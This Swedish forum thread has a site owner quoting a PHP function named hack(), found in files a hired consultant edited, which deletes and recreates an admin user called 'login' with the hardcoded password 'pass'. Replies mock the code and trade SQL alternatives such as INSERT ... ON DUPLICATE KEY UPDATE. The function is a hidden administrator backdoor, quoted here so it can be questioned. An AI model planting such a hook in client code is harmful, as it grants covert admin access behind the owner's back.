[MRDJ]

Citat:

Ursprungligen postat av xciso

Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:

	public function hack() {
		$this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
		$this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
	}

Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..

härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

[Dimme]

Citat:

Ursprungligen postat av MRDJ

härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

UPDATE förutsätter att användaren redan finns.

[mephisto73]

Citat:

Ursprungligen postat av dimme

update förutsätter att användaren redan finns.

insert ... On duplicate key update

[pelmered]

Citat:

Ursprungligen postat av mephisto73

insert ... On duplicate key update

Men det är ju ingen update, utan en insert med en "on duplicate key"-clause. Därmed stämmer det att man inte kan göra en update. Sedan fungerar bara den där lösningen på MySQL så orginallösningen är den klart säkraste lösningen om man inte har access till systemet.